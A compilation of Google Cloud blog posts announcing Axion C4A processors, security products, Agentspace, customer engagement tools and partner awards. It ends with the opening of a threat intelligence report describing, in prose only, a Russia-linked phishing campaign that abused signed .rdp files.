Since then, Axion has shaken up the market for cloud compute. Customers love its price-performance — up to 65% better than current-generation x86 instances. It even outperforms leading Arm-based alternatives by up to 10%. Axion C4A instances were also the first virtual machines to feature new Google Titanium SSDs, with up to 6TB of high-performance local storage, up to 2.4M random read IOPS, up to 10.4 GiB/s of read throughput, and up to 35% lower access latency compared to previous-generation SSDs. In fact, in the months since launch, over 40% of Compute Engine’s top 100 customers are using Axion, thousands of Google’s internal applications are now running on Axion, and we continue to expand integration of C4A and Axion with our most popular Google Cloud’s products and partner solutions.
Today, we are excited to share that Cloud SQL and AlloyDB for PostgreSQL managed databases are available in preview on C4A virtual machines,providing significant price-performance advantages for database workloads. To utilize Axion processors today, you can now choose to host your database on a C4A VM from directly within the console.
aside_block
<ListValue: [StructValue([(‘title’, ‘$300 in free credit to try Google Cloud infrastructure’), (‘body’, <wagtail.rich_text.RichText object at 0x3ea4dcf923d0>), (‘btn_text’, ‘Start building for free’), (‘href’, ‘http://console.cloud.google.com/freetrial?redirectPath=/compute’), (‘image’, None)])]>
Supercharging database workloads
Organizations with business-critical database workloads need high-performance, cost-efficient, available, and scalable infrastructure. However, a surge of data growth alongside higher and more complex processing requirements are creating challenges.
C4A instances bring significant advantages to managed Google Cloud database workloads: improved price-performance compared to x86 instances, translating to more cost-effective database operations. Designed to handle data-intensive workloads requiring real-time processing, C4A is well-suited for high-performance databases and analytics engines.
When running on C4A instances, AlloyDB and Cloud SQL provide nearly 50% better price-performance than N series VMs for transactional workloads, and up to 2x better throughput than Amazon’s equivalent Graviton 4 offerings.
“At Mercari, we deploy thousands of Cloud SQL instances across engines and editions to meet our diverse database workload requirements. At our scale, it is critical to optimize our fleet to run more efficiently. We are excited to see the price-performance improvements on the new Axion-based C4A machine series for Cloud SQL. We look forward to adopting C4A instances in our MySQL and PostgreSQL fleet and taking advantage of the C4A’s high-performance while at the same time reducing our operational costs.” – Takashi Honda, Database Reliability Engineer, Mercari
We’ve also expanded regional availability for Axion and C4A. It is now broadly available across 10 Google Cloud Regions, which will expand to 15 Google Cloud Regions in the coming months. Cloud SQL and AlloyDB on Axion is now available in eight regions, with more to be added before the end of the year.
Google’s internal fleet and top customers choose Axion
Given its price-performance, it’s no surprise that in less than a year, Axion is a popular choice for Google internal applications and top Compute Engine customers, including Spotify:
“As the world’s most popular audio streaming subscription service, reaching over 675 million users, Spotify demands exceptional performance and efficiency. We are in the process of migrating our entire compute infrastructure to Axion and this is yielding remarkable results. We’re witnessing a staggering 250% performance increase, significantly enhancing the user experience, as much as 40% reduction in compute costs, and a drastic reduction in compute management toil, allowing us to reinvest in further innovation and growth.” – Dave Zolotusky, Principal Engineer, Spotify
And we’re only just getting started. We’re also making it easier for Google Cloud customers to benefit from Axion’s price-performance without having to refactor their applications. Google Cloud customers can already use C4A VMs in Compute Engine, Google Kubernetes Engine (GKE), Batch, Dataproc, Dataflow, and more services.
Expanding the Axion and Arm ISV ecosystem
Axion processors are delivering undeniable value for customers and ISVs looking for security, efficiency and competitive price-performance for data processing. We’re pleased to report that ClickHouse, Databricks, Elastic, MongoDB, Palo Alto Networks, Redis Labs, and Starburst have all chosen Axion to power their data processing products — with support from many more ISVs on the way. This commitment is notable as ISVs often choose Axion over alternative processors, including Arm-based processors from other cloud providers.
01
02
03
04
05
06
Enhancing diverse ML inference workloads
Machine learning (ML) inference workloads span traditional embedding models to modern generative AI applications, each with unique price performance needs that defy a one-size-fits-all approach. The range of inference tasks, from low-latency real-time predictions to high-throughput batch processing, necessitates infrastructure designed for specific workload requirements.
Google’s Axion C4A VMs deliver exceptional performance for ML workloads through architectural strengths like the Arm Neoverse V2 compute cores, with high single-threaded performance and memory bandwidth per-core for predictable, high-throughput execution, and Google’s Titanium offload system technology for reduced overhead. With up to 72 vCPUs, 576 GB of DDR5 memory, and advanced SIMD processing capabilities, Axion C4A excels at matrix-heavy inference tasks. Combined with its easy obtainability, operational familiarity, and up to 60% better energy efficiency compared to x86 alternatives, Axion offers a compelling CPU-based ML inference platform, alongside GPUs and TPUs.
In particular, Axion is well-suited for real-time serving of recommendation systems, NLP, threat detection, and image recognition models. As large language models (LLMs) with lower parameter counts (3-8B) grow increasingly capable, Axion can also be a viable platform for serving these models efficiently.
Customers have recognized this Axion strength and are actively deploying ML inference workloads on C4A VMs to capitalize on its blend of performance, cost-effectiveness, and scalability, proving it a worthy complement to GPU-centric strategies. Palo Alto Networks uses C4A as part of their diversified ML infrastructure platform strategy and realized 85% performance TCO efficiency by migrating their threat detection inference application from L4 GPUs to C4A.
“By migrating to Axion on Google Cloud, our testing shows that DNS Security will see a 85% improvement in price-performance, a 2X decrease in latency for DNS queries, and a 85% cost savings compared to instances with mid-range GPUs, enhancing our ML-powered DGA detections for customers.” – Fan Fei, Director of Engineering, Palo Alto Networks
Learn more about Axion-based C4A virtual machines
In their quest to balance performance, efficiency, and cost, more and more organizations are turning to Arm architecture. Axion’s strong price-performance combined with a growing ecosystem of support by mission-critical workloads makes it a compelling choice. We’ve seen incredible excitement for Axion-based C4A virtual machines from our customers and partners, and we can’t wait to see what you can build with Axion, too.Try Cloud SQL and AlloyDB running on C4A virtual machines today.
Today at Google Cloud Next, we are announcing Google Unified Security, new security agents, and innovations across our security portfolio designed to deliver stronger security outcomes and enable every organization to make Google a part of their security team.
Introducing Google Unified Security
Enterprise infrastructure continues to grow in size and complexity, expanding the attack surface, and making defenders’ jobs increasingly difficult. Separate, disconnected security tools result in fragmented data without relevant context, leaving organizations vulnerable and reactive in the face of escalating threats. Security teams operate in silos, slowed by toilsome workflows, making it hard to accurately assess and improve the organization’s overall risk profile.
To address this challenge, we are bringing together our best-in-class security products for threat intelligence, security operations, cloud security, and secure enterprise browsing, along with Mandiant expertise, into a converged security solution powered by AI: Google Unified Security.
Now generally available, Google Unified Security lays the foundation for superior security outcomes. It creates a single, scalable, searchable security data fabric across the entire attack surface. It provides visibility, and detection and response capabilities, across networks, endpoints, clouds, and apps. It automatically enriches security data with the latest Google Threat intelligence for more effective detection and prioritization. Crucially, Google Unified Security makes every aspect of the practitioner experience more efficient with Gemini.
“Google Unified Security represents a step forward in achieving better security outcomes with the integration of browser behavior, managed threat hunting, and security validation to strategically eliminate coverage gaps and simplify security management and threat detection and response. This approach offers organizations a more holistic and streamlined defense against today’s complex threat landscape,” said Michelle Abraham, senior research director, Security and Trust, IDC.
At the heart of Google Unified Security’s capabilities lie its integrated product experiences, exemplified by:
Browser telemetry and asset context from Chrome Enterprise integrated into Google Security Operations to power threat detections and remediation actions.
Google Threat Intelligence integrated with security validation to proactively understand exposures and test security controls against the latest observed threat actor activity.
Cloud risks and exposures from Security Command Center, including those impacting AI workloads, enriched with integrated Google Threat Intelligence to more effectively threat hunt and triage incidents.
Infused with new semi-autonomous AI capabilities, these integrated products provide preemptive security, enabling organizations to anticipate threats and remediate risks before attackers can act to cause business damage or loss.
“I see Google and its security suite as one of the top partnerships that I have within my organization. The value they bring, the expertise and the knowledge, the willingness to play with us to explore new opportunities and to look at new areas — it makes them a true partner and someone that we’re very happy to be working together with,” said Craig McEwen, deputy CISO, Unilever.
“Accenture and Google Cloud partner to help clients achieve the cyber resilience their businesses need to stay ahead of today’s threats. By integrating advanced threat intelligence, comprehensive visibility and AI assistance, we can help organizations shift from reactive to proactive and agile responses,” said Paolo Dal Cin, global lead, Accenture Security. “This unified approach, powered by Google Unified Security, can help us deliver a new standard of cyber resilience with greater scale, speed and effectiveness.”
“Deloitte Cyber and Google Cloud are working closely together to secure the modern enterprise – which includes using the leadingcapabilities from both Deloitte and Google to protect data, users, and applications. Google Unified Security brings together a centralized data fabric, integrated threat intelligence, unified SOC and cloud workflows, and agentic AI automation — creating a powerful platform to drive our clients’ security transformation,” said Adnan Amjad, principal, U.S. cyber leader, Deloitte & Touche LLP.
Security agents and Gemini
Agentic AI is powering a fundamental shift in how security operations are conducted. Our vision is a future where intelligent agents work alongside human analysts, offloading routine tasks, augmenting their decision-making, and freeing them to focus on complex issues. Today we’re introducing the following new Gemini in Security agents:
In Google Security Operations, an alert triage agent performs dynamic investigations on behalf of users. Expected to preview for select customers in Q2 2025, this agent analyzes the context of each alert, gathers relevant information, and renders a verdict on the alert, along with a history of the agent’s evidence and decision making. This always-on investigation agent will vastly reduce the manual workload of Tier 1 and Tier 2 analysts who otherwise are triaging and investigating hundreds of alerts per day.
In Google Threat Intelligence, a malware analysis agent investigates whether code is safe or harmful. Expected to preview for select customers in Q2 2025, this agent analyzes potentially malicious code, including the ability to create and execute scripts for deobfuscation. Ultimately, the agent summarizes its work and provides a final verdict.
These agentic AI advancements aim to deliver faster detection and response, with complete visibility and streamlined workflows. They represent a catalyst for security teams to reduce toil, build true cyber-resilience, and drive strategic program transformation.
What’s new in Google Security Operations
New data pipeline management capabilities, now generally available,can help customers better manage scale, reduce costs, and satisfy compliance mandates. Expanding our partnership with Bindplane, you can now transform and prepare data for downstream use; route data to different destinations and multiple tenants to manage scale; filter data to control volume; and redact sensitive data for compliance.
The new Mandiant Threat Defense service for Google Security Operations, now generally available, provides comprehensive active threat detection, hunting, and response. Mandiant experts work alongside customer security teams, using AI-assisted threat hunting techniques to identify and respond to threats, conduct investigations, and scale response through security operations SOAR playbooks, effectively extending customer security teams.
What’s new in Security Command Center
We recently announced AI Protection capabilities for managing risk across the AI lifecycle for Google Cloud customers. AI Protection helps discover AI inventory, secure AI models and data, and detect and respond to threats targeting AI systems.
Model Armor, which is generally available and part of AI Protection, allows you to apply content safety and security controls to prompts and responses for a broad range of models across multiple clouds. Model Armor is now integrated directly with Vertex AI so developers can automatically route prompts and responses for protection without any changes to applications.
New Data Security Posture Management (DSPM) capabilities, coming to preview in June, can enable discovery, security, governance, and monitoring of sensitive data including AI training data. DSPM can help discover and classify sensitive data, apply data security and compliance controls, monitor for violations, and enforce access, flow, retention, and protection directly in Google Cloud data analytics and AI products.
A new Compliance Manager, launching in preview at the end of June, will combine policy definition, control configuration, enforcement, monitoring, and audit into a unified workflow. It builds on the configuration of infrastructure controls delivered using Assured Workloads, providing Google Cloud customers with an end-to-end view of their compliance state, making it easier to monitor, report, and prove compliance to auditors with Audit Manager.
Other Security Command Center enhancements include:
Integration with Snyk’s developer security platform, in preview, to help teams find and fix software vulnerabilities faster.
New Security Risk dashboards for Google Compute Engine and Google Kubernetes Engine, generally available, which deliver insights into top security findings, vulnerabilities, and open issues directly in the product consoles.
We are also expanding our Risk Protection Program, which provides discounted cyber-insurance coverage based on cloud security posture. We’re thrilled to welcome Beazley and Chubb, two of the world’s largest cyber-insurers, as new program partners to expand customer choice and broaden international coverage.
As part of the program, our partners provide affirmative AI insurance coverage, exclusively for Google Cloud customers and workloads. Chubb will also offer coverage for risks resulting from quantum exploits, proactively helping to address the risk of quantum computing attacks.
What’s new in Chrome Enterprise
New employee phishing protections in Chrome Enterprise Premium use Google Safe Browsing data to help protect employees against lookalike sites and portals attempting to capture credentials. Organizations can now configure and add their own branding and corporate assets to help identify phishing attempts disguised on internal domains.
Organizations continue to benefit from the simple and effective data protections in Chrome. In addition to watermarking and screenshot blocking, and controls for copy, paste, upload, download, and printing, Chrome Enterprise Premium data masking is now generally available. We’re also extending key enterprise browsing protections to Android, including copy and paste controls, and URL filtering.
What’s new in Mandiant Cybersecurity Consulting
TheMandiant Retainer provides on-demand access to Mandiant experts with pre-negotiated terms and two-hour incident response times. Customers now have additional flexibility to redeem pre-paid funds for investigations, education, and intelligence to boost their expertise and resilience.
Mandiant Consulting is also partnering with Rubrik and Cohesity to create a solution to minimize downtime and recovery costs after a cyberattack. Together, Mandiant consultants and our data backup and recovery partners can help customers establish, test, and validate a cloud-isolated recovery environment (CIRE) for critical applications on Google Cloud, and deliver incident response services in the event of a compromise.
What’s new for Trusted Cloud
We continue regular delivery of new security controls and capabilities on our cloud platform to help organizations meet evolving policy, compliance, and business objectives. Today we’re announcing the following updates:
For Sovereign Cloud:
Google Cloud has brought to market the industry’s broadest portfolio of sovereign cloud solutions, providing customers with choice to meet the unique and evolving requirements for data, operational, and software sovereignty. Google Cloud offers Regional and Sovereign Controls across 32 regions in 14 countries. We also offer Google Cloud Sovereign AI services in our public cloud, sovereign cloud, and distributed clouds, as well as with Google Workspace.
We’ve partnered with Thales to launch the S3NS Trusted Cloud, now in preview, designed to meet France’s highest level of cloud certification, the SecNumCloud standard, defined by the National Cyber Agency. It is the first sovereign cloud offering based on Google Cloud platform, that is in this case operated, majority-owned and fully controlled by a European organization.
For Identity and Access Management:
Unified access policies, coming to preview in Q2, create a single definition forIAM allow andIAM deny policies, enabling you to more consistently apply fine grained access controls.
We’re also expanding our Confidential Computing offerings. Confidential GKE Nodes with AMD SEV-SNP and Intel TDX will be generally available in Q2, requiring no code changes to secure your standard GKE workloads. Confidential GKE Nodes with NVIDIA H100 GPUs on the A3 machine series will be in preview in Q2, offering confidential GPU computing without code modifications.
Single-tenant Cloud Hardware Security Module (HSM), now in preview, provides dedicated, isolated HSM clusters managed by Google Cloud, while granting customers full administrative control.
For network security:
Network Security Integration allows enterprises to easily insert third-party network appliances and service deployments to protect Google Cloud workloads without altering routing policies or network architecture. Out-of-band integrations with ecosystem partners are generally available now, while in-band integrations are available in preview.
DNS Armor, powered by Infoblox Threat Defense, coming to preview later this year, uses multi-sourced threat intelligence and powerful AI/ML capabilities to detect DNS-based threats.
Cloud Armor Enterprise now includes hierarchical policies for centralized control and automatic protection of new projects, available in preview.
Cloud NGFW Enterprise supports L7 domain filtering capabilities to monitor and restrict egress web traffic to only approved destinations, coming to preview later this year.
Secure Web Proxy (SWP) now includes inline network data loss protection capabilities through integrations with Google’s Sensitive Data Protection and Symantec DLP using service extensions, available in preview.
Take the next step
These announcements just scratch the surface of the outcomes we can deliver when we converge our security capabilities and infuse them with AI and our frontline intelligence.
In today’s threat landscape, one of the most critical choices you need to make is who will be your strategic security partner, and Google Unified Security is the best, easiest, and fastest way to make Google part of your security team.
For more on our Next ‘25 announcements, you can watch our security spotlight, and check out the many great security breakout sessions at Next ‘25 — live and on-demand.
AI agents are a major leap from traditional automation or chatbots. They can execute complex workflows, from planning and research, to generating and testing novel ideas. But to scale, businesses need an AI-ready information ecosystem that can work across silos, easy ways to create and adopt agents, and enterprise-grade security and compliance.
That’s why we launched Google Agentspace in December. This product puts the latest Google foundation models, powerful agents, and actionable enterprise knowledge in the hands of employees. With Agentspace, employees and agents can find information from across their organization, synthesize and understand it with Gemini’s multimodal intelligence, and act on it with AI agents.
Since the launch, we have seen tremendous interest in Agentspace from leading organizations like Banco BV, Cohesity, Gordon Food Services, KPMG, Rubrik, Wells Fargo, and more.
We’re accelerating this momentum by expanding Agentspace, currently generally available via allowlist, to make creating and adopting agents simpler. Starting today, customers can:
Give employees access to Agentspace’s unified enterprise search, analysis, and synthesis capabilities, directly from the search box in Chrome
Discover and adopt agents quickly and easily with Agent Gallery, and create agents with our new no-code Agent Designer
Deploy Google-built agents such as our new Deep Research and Idea Generation agents to help employees generate and validate novel business ideas, synthesize dense information, and more
“We recently began our roll out of Google Agentspace to US employees at Gordon Food Service, with the goal of empowering them with greater access to our enterprise intelligence. This implementation has already started to transform how we access enterprise knowledge, wherever it is, as our searches are now grounded in our data across Google Workspace and other sources like ServiceNow. Employees are benefitting from easier access because they can search across multiple systems in one place, which translates to better decision-making, and less legwork to discover information. Ultimately, Agentspace will enhance both our internal operations and product development. enabling us to serve our customers better.” – Matt Jansen, Manager of Emerging Technology, Gordon Food Service.
aside_block
<ListValue: [StructValue([(‘title’, ‘$300 in free credit to try Google Cloud AI and ML’), (‘body’, <wagtail.rich_text.RichText object at 0x3e2a46141a60>), (‘btn_text’, ‘Start building for free’), (‘href’, ‘http://console.cloud.google.com/freetrial?redirectPath=/vertex-ai/’), (‘image’, None)])]>
Unified agentic search, directly from search box in Chrome
Imagine being able to find any piece of information within the organization – whether that’s text, images, websites, audio, and video – with the ease and power of Google-quality search. That’s what we’re bringing to enterprises with Google’s AI-powered multimodal search capabilities in Agentspace, helping customers to find what they need, regardless of how – and where – it’s stored. Whether the right information resides in common work apps like Google Workspace, Microsoft 365, apps like Jira, Salesforce, or ServiceNow, or in content from the web, Agentspace breaks down silos and understands organizational context. By building an enterprise knowledge graph for each customer — connecting employees with their team, documents they have created, software and data they can access, and more — it helps turn disjointed content into actionable knowledge.
Starting today in preview, Agentspace is integrated with Chrome Enterprise, letting employees leverage Agentspace’s unified search capabilities right from the search box in Chrome. Bringing Agentspace directly into Chrome will help employees easily and securely find information, including data and resources, right within their existing workflows.
Find data within your existing workflows directly from the search box in Chrome
Fast, simple agent adoption and creation
Google Agentspace provides employees – no matter their technical expertise – with access to specialized agents connected to various enterprise systems, so employees can integrate agents into their workflows and priorities with ease. We’re introducing two new features to help employees adopt and create agents for their specific needs:
Agent Gallery, generally available with allowlist, gives employees a single view of available agents across the enterprise, including those from Google, internal teams, and partners — making agents easy to discover and use. Customers can choose agents published by partners in Google Cloud Marketplace, then enable them in Agent Gallery, adding to our agent ecosystem and options for customers.
Agent Designer, in preview with allowlist, is a no-code interface for creating custom agents that connect to enterprise data sources and automate or enhance everyday knowledge work tasks. This helps employees – even those with limited technical experience – create agents suited to their individual workflows and needs. Thanks to deep integration between our products, Agent Designer complements the deeper, developer-first approaches available in Vertex AI Agent Builder, and agents built in Vertex AI Agent Builder can be published to Agentspace.
Powerful new expert agents: Idea Generation agent and Deep Research agent
As part of the Agent Gallery launch, two new, Google-built expert agents will join the previously-available NotebookLM for Enterprise:
Deep Research agent, generally available with allowlist, explores complex topics on the employee’s behalf, synthesizing information across internal and external sources into comprehensive, easy-to-read reports — all with a single prompt.
Idea Generation agent, available in preview with allowlist, helps employees innovate by autonomously developing novel ideas in any domain, then evaluating them to find the best solutions via a competitive system inspired by the scientific method.
Create a multi-agent innovation session with Idea Generation agent
Beyond expert agents, Agentspace supports the new open Agent2Agent (A2A) Protocol, which is designed to let agents across different ecosystems communicate with each other. As the first hyperscaler to drive this initiative for the industry, we believe this protocol will be critical to support multi-agent communication by giving agents a common language – regardless of the framework or vendor they are built on. This allows developers to choose the tools and frameworks that best suit their needs.
Enterprise-grade data protections and security
Agentspace was built on the same secure Google infrastructure trusted by billions of people. It is enterprise-ready, so as agents collaborate with employees and access corporate data, security, monitoring, and other essential requirements remain at the forefront.
It lets customers scan systems for sensitive information, such as PHI or PII data, or confidential elements, then choose whether to block these assets from agents and search. It also provides role-based access controls, encryption with customer-managed keys, data residency guarantees, and more.
We’re also growing the AI Agent Marketplace, a dedicated section within Google Cloud Marketplace. Customers can easily browse and purchase AI agents from partners such as Accenture, Deloitte, and more. Enterprise admins can make these agents available within Agentspace for added productivity and innovation. The growing variety of options lets each employee build and manage a team of agents to help them work — and we look forward to more innovation in the months to come.
Get started with Google Agentspace
As the ability to adopt and customize agents becomes more essential, we’re ready to take this journey with you — and excited to see what you accomplish with Agentspace.
Envision a future where every customer interaction is not only seamless and personalized, but delivers enduring experiences that build brand loyalty.
Today, AI agents are already transforming the ways businesses engage with customers — including advanced conversational agents. In fact, these conversational AI agents are enabling new levels of hyper-personalized, multimodal conversations with customers, and it’s improving customer interactions across all touchpoints.
And this is just the beginning.
While deploying AI for customer service is not entirely new, traditional deployments were limited in their ability to deliver personalized customer experiences at scale. Google Cloud’s Customer Engagement Suite was created to address these gaps through an end-to-end AI customer experience application that’s built with Google’s planet-scale capacity, performance, and quality. Customer Engagement Suite allows customers to connect with your business across any channel — such as web, mobile, email or voice — offering a consistent, personalized experience wherever you connect.
Recently we announced new AI-enabled capabilities to the four products within the Customer Engagement Suite — Conversational Agents, Agent Assist, Conversational Insights, and Google Cloud Contact Center-as-a-Service.
The Conversational Agentsproduct, helps customers build virtual agents that provide self-service experiences for customer service needs. Today we are unveiling a completely revamped and powerful new product for building and running generative and agentic conversational agents. This next generation Conversational Agents product will enable teams to create highly interactive, enterprise-grade AI agents in just a few keystrokes.
aside_block
<ListValue: [StructValue([(‘title’, ‘$300 in free credit to try Google Cloud AI and ML’), (‘body’, <wagtail.rich_text.RichText object at 0x3e2a303998b0>), (‘btn_text’, ‘Start building for free’), (‘href’, ‘http://console.cloud.google.com/freetrial?redirectPath=/vertex-ai/’), (‘image’, None)])]>
The next generation of Conversational Agents
The leading capabilities provided by the next generation of the product include:
Simplifying how AI agents are built: Building AI agents has traditionally required specialized technical expertise. The next generation of Conversational Agents will use the latest Gemini models and Agent Development Kit, along with a comprehensive suite of enterprise-grade features such as privacy controls and AI observability. These power a no-code console that enables even non-technical employees to build complex conversational AI agents that deliver exceptional customer experiences in just a few clicks.
Enabling highly engaging customer experiences: The latest Gemini models enable human-like, high-definition voices; a higher degree of comprehension; and the ability to understand emotions — which all can help AI agents adapt during conversations. The product also supports streaming video, so the agents can interpret and respond to what they see in real-time when shared from customer devices.
Automating work across operations: Earlier we introduced out-of-the-box connectors to provide easy integration with the most popular customer relationship management (CRM) systems, data sources, and business messaging platforms. With the next generation of Conversational Agents, enterprise users will have a variety of tools to interact and perform specific tasks, such as look up products, add to cart, and check out with their applications through API calls.
Over the last year, our portfolio of conversational AI agents and applications has helped companies enhance customer experiences and turn them into moments of brand loyalty, both within their customer service operations and beyond.
Verizon transforms customer experiences with Customer Engagement Suite
Verizon is transforming how they serve their more than 115 million wireless connections with the help of Customer Engagement Suite. Human assisted AI-powered agents have helped customers with a range of day-to-day tasks, in stores and over the phone.
Verizon’s Personal Research Assistant provides the company’s 28,000 customer care representatives with the information they need to answer a customer’s question instantly, and personalized for their unique needs. Able to answer 95% of questions, the Personal Research Assistant reduces the cognitive load so care representatives can focus on the customer, leading to faster and more satisfying resolutions.
“At Verizon, we’re focused on transforming every customer interaction into a moment of genuine connection,” said Sampath Sowmyanarayan, chief executive officer, Verizon Consumer Group. “Google’s Customer Engagement Suite allows us to deliver faster, more personalized service, significantly reducing call times and empowering our team to focus on what truly matters: our customers. This human in the loop technology is not just about ease and simplicity; it’s about building lasting loyalty through exceptional experiences.”
Wendy’s and MercedesBenz deliver exceptional conversational experiences with vertical AI agents
We are also helping companies deliver great customer experiences beyond the contact center — meeting customers where they are, whether it’s in-store, in vehicles, or on personal devices like smartphones. We do this by providing readily deployable vertical AI agents that address specific real-world use cases.
This includes, the Food Ordering AI Agent, which delivers accurate, consistent, multilingual experiences, and the Automotive AI Agent, which offers deeply personalized, in-vehicle experiences.
Wendy’s is expanding their FreshAI deployment across 24 states. This drive-thru ordering system uses our Food Ordering AI Agent to handle 50,000 orders daily, in multiple languages, with a 95% success rate.
MercedesBenz is providing advanced conversational capabilities, including conversational search and navigation in the new CLA series this year, by integrating our Automotive AI Agent into their MBUX Virtual Assistant.
Take the next step
Read more about how organizations of all sizes across all industries are transforming customer experience with Customer Engagement Suite in this recent blog.
Watch the Google NEXT keynote and join us at the AI in Action showcase for a live demonstration of the Conversational Agents.
Schedule a free consultation with Google’s AI specialists to identify specific use cases and applications that will help your organization deliver similar business impact results.
It’s an honor to announce the 2025 Google Cloud Partner of the Year winners!
It takes a lot to build great AI and cloud technology. Advancements and innovation come from collaboration, and Google Cloud has thousands of partners to make this happen. Among these, we’re excited to recognize dozens who take our work to the next level. These distinguished partners have demonstrated incredible dedication, innovation, and collaboration in delivering impactful solutions that drive success for our customers. Their contributions to the Google Cloud community are truly remarkable and deserve to be recognized.
Please join us in congratulating the winners in the following categories on their outstanding achievements.
Global
This award celebrates top global partners who exemplify excellence in their category, driving innovation and delivering industry-leading solutions with Google Cloud. With a customer-first approach, these partners have demonstrated outstanding leadership, impact, and commitment to transforming businesses worldwide.
Country
This award honors top partners who have demonstrated expertise in leveraging their services and solutions in their country or region to drive sales and deliver outstanding outcomes for Google Cloud customers.
Industry Solutions
Partners receiving this award have leveraged Google Cloud capabilities to create comprehensive and compelling solutions that made a significant impact in one or more industries across multiple regions.
Technology
This award recognizes partners who used a winning combination of Google Cloud technology in a specific technology segment to deliver innovative solutions and customer satisfaction.
Business Applications
Winners of this award have leveraged Google Cloud capabilities to create comprehensive and compelling technology solutions that made a significant impact in one industry across multiple regions.
Artificial Intelligence
This award recognizes partners who helped customers leverage generative AI in 2024 to achieve outstanding success through Google Cloud technology.
Data & Analytics
Partners receiving this award have expertly migrated or deployed new Google Cloud data analytics solutions to help customers extract actionable insights from their data, fueling business transformation.
Databases
This award recognizes partners who have successfully implemented and optimized Google Cloud’s database solutions, enabling their customers to manage data efficiently, securely, and at scale.
Google Workspace
This category honors partners who have excelled in driving sales and delivering outstanding services for Google Workspace, empowering customers with transformative solutions for collaboration and productivity.
Infrastructure Modernization
This award recognizes partners who have helped customers modernize their infrastructure by leveraging Google Cloud’s innovative solutions to increase agility, scalability, and cost-efficiency.
Public Sector
Winners of this award have provided exceptional service and enabled the success of their public sector customers by innovating, building, and delivering the right combination of solutions.
Security
This category honors partners who have effectively implemented Google Cloud’s security solutions, safeguarding their customers’ data and infrastructure from evolving threats.
Talent Development
Partners receiving this award have demonstrated a commitment to growing their team’s cloud skills through training, upskilling, and reskilling their workforce on leading-edge technology with Google Cloud certifications.
Training
Winners of this award have provided exceptional training services and enabled customer success by innovating, building, and delivering the right combination of Google Cloud solutions through learning.
Social Impact
This award recognizes partners who have demonstrated exceptional commitment to driving positive social impact through innovative solutions and initiatives within their organizations.
Once again, congratulations to our 2025 Google Cloud Partner of the Year winners. It’s our privilege to recognize you for all of the groundbreaking work that you do. We look forward to another future-defining year of innovation and collaboration in the cloud.
In October 2024, Google Threat Intelligence Group (GTIG) observed a novel phishing campaign targeting European government and military organizations that was attributed to a suspected Russia-nexus espionage actor we track as UNC5837. The campaign employed signed .rdp file attachments to establish Remote Desktop Protocol (RDP) connections from victims’ machines. Unlike typical RDP attacks focused on interactive sessions, this campaign creatively leveraged resource redirection (mapping victim file systems to the attacker servers) and RemoteApps (presenting attacker-controlled applications to victims). Evidence suggests this campaign may have involved the use of an RDP proxy tool like PyRDP to automate malicious activities like file exfiltration and clipboard capture. This technique has been previously dubbed as “Rogue RDP.”
The campaign likely enabled attackers to read victim drives, steal files, capture clipboard data (including passwords), and obtain victim environment variables. While we did not observe direct command execution on victim machines, the attackers could present deceptive applications for phishing or further compromise. The primary objective of the campaign appears to be espionage and file theft, though the full extent of the attacker’s capabilities remains uncertain. This campaign serves as a stark reminder of the security risks associated with obscure RDP functionalities, underscoring the importance of vigilance and proactive defense.
Introduction
Remote Desktop Protocol (RDP) is a legitimate Windows service that has been wellresearched by the security community. However, most of the security community’s existing research is focused on the adversarial use of RDP to control victim machines via interactive sessions.
This campaign included use of RDP that was not focused on interactive control of victim machines. Instead, adversaries leveraged two lesser-known features of the RDP protocol to present an application (the nature of which is currently unknown) and access victim resources. Given the low prevalence of this tactic, technique, and procedure (TTP) in previous reporting, we seek to explore the technical intricacies of adversary tradecraft abusing the following functionality of RDP:
RDP Property Files (.rdp configuration files)
Resource redirection (e.g. mapping victim file systems to the RDP server)
RemoteApps (i.e. displaying server-hosted applications to victim)
Additionally, we will shed light on PyRDP, an open-source RDP proxy tool that offers attractive automation capabilities to attacks of this nature.
By examining the intricacies of the tradecraft observed, we gain not only a better understanding of existing campaigns that have employed similar tradecraft, but of attacks that may employ these techniques in the future.
Campaign Operations
This campaign tracks a wave of suspected Russian espionage activity targeting European government and military organizations via widespread phishing. Google Threat Intelligence Group (GTIG) attributes this activity to a suspected Russia-nexus espionage actor group we refer to as UNC5837. The Computer Emergency Response Team of Ukraine (CERT-UA) reported this campaign on Oct. 29, 2024, noting the use of mass-distributed emails with.rdp file attachments among government agencies and other Ukrainian organizations. This campaign has also been documented by Microsoft, TrendMicro, and Amazon.
The phishing email in the campaign claimed to be part of a project in conjunction with Amazon, Microsoft, and the Ukrainian State Secure Communications and Information Security Agency. The email included a signed .rdp file attachment purporting to be an application relevant to the described project. Unlike more common phishing lures, the email explicitly stated no personal data was to be provided and if any errors occurred while running the attachment, to ignore it as an error report would be automatically generated.
Figure 1: Campaign email sample
Executing the signed attachment initiates an RDP connection from the victim’s machine. The attachment is signed with a Let’s Encrypt certificate issued to the domain the RDP connection is established with. The signed nature of the file bypasses the typical yellow warning banner, which could otherwise alert the user to a potential security risk. More information on signature-related characteristics of these files are covered in a later section.
The malicious .rdp configuration file specifies that, when executed, an RDP connection is initiated from the victim’s machine while granting the adversary read & write access to all victim drives and clipboard content. Additionally, it employs the RemoteApp feature, which presents a deceptive application titled “AWS Secure Storage Connection Stability Test” to the victim’s machine. This application, hosted on the attacker’s RDP server, masquerades as a locally installed program, concealing its true, potentially malicious nature. While the application’s exact purpose remains undetermined, it may have been used for phishing or to trick the user into taking action on their machine, thereby enabling further access to the victim’s machine.
Further analysis suggests the attacker may have used an RDP proxy tool like PyRDP (examined in later sections), which could automate malicious activities such as file exfiltration and clipboard capture, including potentially sensitive data like passwords. While we cannot confirm the use of an RDP proxy tool, the existence, ease of accessibility, and functionalities offered by such a tool make it an attractive option for this campaign. Regardless of whether such a tool was used or not, the tool is bound to the permissions granted by the RDP session. At the time of writing, we are not aware of an RDP proxy tool that exploits vulnerabilities in the RDP protocol, but rather gives enhanced control over the established connection.
The techniques seen in this campaign, combined with the complexity of how they interact with each other, make it tough for incident responders to assess the true impact to victim machines. Further, the number of artifacts left to perform post-mortem are relatively small, compared to other attack vectors. Because existing research on the topic is speculative regarding how much control an attacker has over the victim, we sought to dive deeper into the technical details of the technique components. While full modi operandi cannot be conclusively determined, UNC5837’s primary objective appears to be espionage and file stealing.
Deconstructing the Attack: A Deep Dive into RDP Techniques
Remote Desktop Protocol
